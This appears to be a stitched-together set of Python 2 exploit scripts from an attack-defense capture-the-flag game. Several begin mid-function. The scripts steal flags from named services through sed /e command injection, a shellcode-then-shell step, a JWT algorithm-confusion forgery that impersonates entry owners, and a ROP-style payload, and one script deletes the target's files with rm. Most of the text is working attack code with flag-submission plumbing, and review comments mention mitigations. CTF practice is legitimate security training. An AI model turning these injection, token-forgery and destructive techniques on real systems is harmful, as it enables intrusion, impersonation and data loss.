sys.path.append('./utilities/')
from utils import sendFlag
from utils import getFlagID


def exploit(ip, port, flag_id):
    """Retrieve one flag from the dict/translate service at ip:port.

    The service announces an XOR byte and expects the password XORed with it
    and hex-encoded.  The "password" sent here is a sed-style substitution
    whose replacement is ``cat <flag_id>`` with a trailing ``/e``; the flag is
    then read back from the second line of the ``translate`` reply.  (Server
    side, a user-supplied substitution must never reach an evaluating sed --
    the ``e`` flag turns the replacement into a shell command.)

    Returns the captured flag string.  Raises AttributeError if either regex
    below fails to match the service output.
    """
    pwn.context(timeout=10)
    # Fresh random dictionary name and trigger word so concurrent runs do not collide.
    dict_id = "".join(random.choice(string.ascii_letters) for i in range(30))
    word = "".join(random.choice(string.ascii_letters) for i in range(30))
    # Password line layout: "<random> 0a DELIM s/<word>/cat <flag_id>/e".
    payload = "{} 0a DELIM s/{}/cat {}/e".format("".join(random.choice(string.ascii_letters) for i in range(30)), word, flag_id)
    r = pwn.remote(ip, port)
    r.recvline()  # banner line, discarded
    r.send("dict {}\n".format(dict_id))
    info = r.recvline()
    # The prompt gives the XOR byte as exactly two uppercase hex digits.
    m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
    byte = int(m.group(1), 16)
    # XOR every character with that byte, then hex-encode (Python 2 str.encode('hex')).
    r.send(''.join(chr(ord(c) ^ byte) for c in payload).encode('hex') + '\n')
    r.recvline()  # acknowledgement of the password, discarded
    r.send("translate {}\n".format(word))
    r.send('quit\n')
    r.recvline()  # first translate line, discarded
    flagline = r.recvline()
    # The reply echoes the flag as the replacement part of "s/secretik/<flag>/gi;".
    flag = re.match("s/secretik/(.*)/gi;", flagline).group(1)
    return flag


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print("Usage: %s <ip>" % os.path.basename(__file__))
        sys.exit(1)
    else:
        # Python 2 print statement: submit the flag and echo sendFlag's result.
        print sendFlag(exploit(sys.argv[1], 20067, getFlagID("nadmozg")), "nadmozg")
# (tail of a function whose start is outside this span)
    print c.recv()


def pirate_exploit_id(host, port, flag_id, b):
    """Fetch one flag from the piratemap service at host:port.

    Relies on helpers defined elsewhere in this file -- connect, print_pir,
    search_pir and send_shellcode -- which are not visible here; after they
    run, the connection presumably accepts shell commands, since the function
    issues ``cat <flag_id>`` and returns the raw reply.

    ``b`` is a verbosity toggle: truthy prints the two cleanup reads, falsy
    drains them silently.  The flag is returned as received (no stripping).
    """
    c = connect(host, port)
    sys.stdout.write("Start exploiting")
    sys.stdout.flush()
    print_pir(c, b)
    search_pir(c, "00030000", b)  # the meaning of "00030000" is defined by search_pir -- not visible here
    send_shellcode(c, b)
    if (b):
        print "pulizia " + c.recv() + c.recv()  # "pulizia" = Italian for "cleanup"
    else:
        c.recv() + c.recv()  # same two reads; the concatenated value is discarded
    c.sendline("cat " + str(flag_id))
    time.sleep(0.1)  # short wait so the reply is available to a single recv()
    flag = c.recv()
    print flag
    print("DONE!!;-)")
    return flag


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print "Usage: %s <ip>" % os.path.basename(__file__)
        sys.exit(1)
    else:
        # Python 2 print statement: submit the flag (verbosity off) and echo the result.
        print sendFlag( pirate_exploit_id(sys.argv[1], 20038, getFlagID("piratemap"), 0), "piratemap")
# (tail of a function whose start is outside this span; buf, sock, ip, port
#  and flag_id are bound earlier in that function)
    #while buf != 'exit':
    # Append the read of the htpass directory to whatever command prefix buf already holds.
    buf = buf + "cat /opt/ctf/FHM-Maintenance/rw/doc_root/htpass/*"
    sock.sendall("%s\n" % buf)
    sock.setblocking(False)
    time.sleep(0.1)  # give the service a moment to answer before the non-blocking recv
    try:
        f=sock.recv(8192)
        #print(f)
        submitFlags(f, flag_id)
        # Removes the files just read -- destructive on the target service.
        runCmd(ip, port, "rm /opt/ctf/FHM-Maintenance/rw/doc_root/htpass/*")
        # NOTE(review): f is the str returned by recv(), so f.close() raises
        # AttributeError here; the bare except below swallows it, which means
        # the sys.exit(1) that follows is never reached.
        f.close()
        sys.exit(1)
        #buf=""
        #time.sleep(10)
    except(KeyboardInterrupt):
        exit(1)
    except:
        # Bare except: also hides socket errors and the AttributeError noted above.
        pass


if __name__ == '__main__':
    # parse options
    if len(sys.argv) < 2:
        print "Usage: %s <ip>" % os.path.basename(__file__)
        sys.exit(1)
    else:
        ip = sys.argv[1]
        port = 20111
        exploit(ip, port, getFlagID('FHMMaintenance'))
# (tail of a function whose start is outside this span; entries, jwt_token,
#  base_url and flag_id are bound earlier in that function)
    # Pick the diary entry whose id matches flag_id (last match wins).
    for entry in entries:
        if str(entry['id']) == str(flag_id):
            target_entry = entry
    if not target_entry:
        raise Exception("Entry with flag_id is not in the list1")
    # Split the existing token into its three base64 segments; the original
    # signature is discarded and re-created below.
    (header, body, signature) = jwt_token.split('.')
    # Algorithm confusion: force HS256 so the verifier treats its own RSA
    # public key as an HMAC secret.  The server-side mitigation is to pin the
    # accepted algorithm/key type instead of trusting the token's "alg" field.
    header_decoded = json.loads(base64.b64decode(header).decode())
    header_decoded['alg'] = 'HS256'
    header_payload = base64.b64encode(json.dumps(header_decoded).encode())
    # Impersonate the entry's owner by rewriting the username claim.
    body_decoded = json.loads(base64.b64decode(body).decode())
    body_decoded['username'] = target_entry['owner']
    body_payload = base64.b64encode(json.dumps(body_decoded).encode())
    to_sign = header_payload + b'.' + body_payload
    public_key = get_public_key(base_url)
    # NOTE(review): this local shadows the stdlib 'hmac' module name if it is imported.
    hmac = HMAC.new(public_key.encode(), to_sign, SHA256)
    payload_signature = base64.b64encode(hmac.digest())
    payload_jwt = to_sign + b'.' + payload_signature
    exploit_entry = get_entry(base_url, payload_jwt.decode(), flag_id)
    return exploit_entry['entry']


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: %s <ip>" % os.path.basename(__file__))
        sys.exit(1)
    else:
        # Python 2 print statement; note the script exits with status 1 even on success.
        print sendFlag(exploit(sys.argv[1], 20130, getFlagID("hacker_diary")), "hacker_diary")
        sys.exit(1)
# (tail of a function whose start is outside this span; payld, conn and sock
#  are bound earlier in that function)
    #print('********************** ', payld)
    #payld += ("cat *")[: 0x3c - len(payld) - 2] + '*\0'
    # Execute system('cat flag_id')
    #conn.expect(__EXP_REPLAY_MENU__)
    conn.sendline(payld)
    #conn.expect('\|(FLG.{13})|$')
    #flag = conn.match.group(1)
    time.sleep(0.1)  # brief wait so the whole reply is available to one recv()
    data = sock.recv(1024)
    # Keep only the text between the first '}' and the '***' marker.
    init = data.find('}')
    end = data.find('***')
    data = data[init + 1:end]
    print(data)
    # Fields are '|'-separated; the third one is returned as the flag.
    # (If fewer than three fields are present this raises IndexError.)
    flags = data.split('|')
    return flags[2]


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print "Usage: %s <ip>" % os.path.basename(__file__)
        sys.exit(1)
    else:
        #print getFlagID("ropeman")
        #for i in ropeman_exploit(sys.argv[1], 20129):
        #    print(sendFlag(i, "ropeman"))
        # Python 2 print statement: submit the flag and echo sendFlag's result.
        print sendFlag( ropeman_exploit_id(sys.argv[1], 20129, getFlagID("ropeman")), "ropeman")
def genRndString():
    """Return a random string of 8..16 uppercase letters and digits.

    Uses the non-cryptographic ``random`` module; that is adequate for the
    throw-away identifiers below but not for real secrets.
    """
    rang = randint(8, 16)
    rndString = ''.join(
        random.choice(string.ascii_uppercase + string.digits) for _ in range(rang))
    return rndString


def invalidFlag(ip, port, flag_id):
    """Register a bogus flag under flag_id on the blackgold service.

    Drives the service's menu: four prompt lines are consumed, option "A" is
    chosen, then flag_id, a random password and a random flag value are sent.
    Returns ``{"flag_id": flag_id, "token": password}`` so the caller can
    refer to the registration later.  Nothing in the reply is checked.
    """
    flag_rnd = genRndString()
    password = genRndString()
    c = remote(ip, port)
    for count in range(0, 4):
        c.recvline()  # discard the menu/prompt lines
    c.sendline("A")
    c.recvline()
    c.sendline(flag_id)
    c.sendline(password)
    c.sendline(flag_rnd)
    c.recvline()
    c.close()
    return {"flag_id": flag_id, "token": password}


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print("Usage: %s <ip>" % os.path.basename(__file__))
        sys.exit(1)
    else:
        # Python 2 print statement: echo the returned dict.
        print invalidFlag(sys.argv[1], 20066, getFlagID("blackgold"))
# (tail of a function whose start is outside this span; conn and flag_id are
#  bound earlier in that function)
    #conn.sendline("sh")
    #conn.interactive()
    # NOTE(review): this local shadows the builtin str() for the rest of the function.
    str = "cat " + flag_id
    #str = "/bin/bash"
    print str
    #s=conn.sendline("cat {0}".format(flag_id))
    conn.sendline(str)
    f = conn.recvuntil('\n')  # first line in the file is the password
    print f
    flag = conn.recvuntil('\n').strip()  # second line is the flag
    return flag


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: %s <ip>" % os.path.basename(__file__))
        sys.exit(1)
    else:
        # Python 2 print statement: submit the flag and echo sendFlag's result.
        print sendFlag(exploit(sys.argv[1], 20040, getFlagID("hanoifones")), "hanoifones")

# Dead code kept as a module-level string: an earlier polling loop.
'''
while(True):
    flag_id = getFlagID(HOST, PORT)
    flag = exploit(sys.argv[1], sys.argv[2], flag_id)
    log.info(flag)
    time.sleep(10)
'''
# (tail of a function whose start is outside this span; the "else" belongs to
#  an if-statement and sock is bound earlier in that function)
    else:
        try:
            f = sock.recv(8192)
            # Last line of the reply is printed and returned as the flag.
            print f.splitlines()[-1]
            return f.splitlines()[-1]
        except socket.timeout:
            # No reply within the socket timeout: falls through and returns None.
            pass


if __name__ == '__main__':
    # parse options
    if len(sys.argv) < 2:
        usage()
        sys.exit(1)
    flag_id = getFlagID('FHMMaintenance')
    # cmd = sys.argv[1]
    # if cmd == 'help':
    #     usage()
    #     sys.exit(0)
    # elif cmd == 'shell' and len(sys.argv) >= 4:
    #     pass
    # elif cmd == 'retrieve' and len(sys.argv) >= 5:
    # else:
    #     usage()
    #     sys.exit(1)
    # NOTE(review): the check above only guarantees sys.argv[1]; reading
    # sys.argv[2] raises IndexError when exactly one argument is given.
    ip = sys.argv[2]
    port = 20111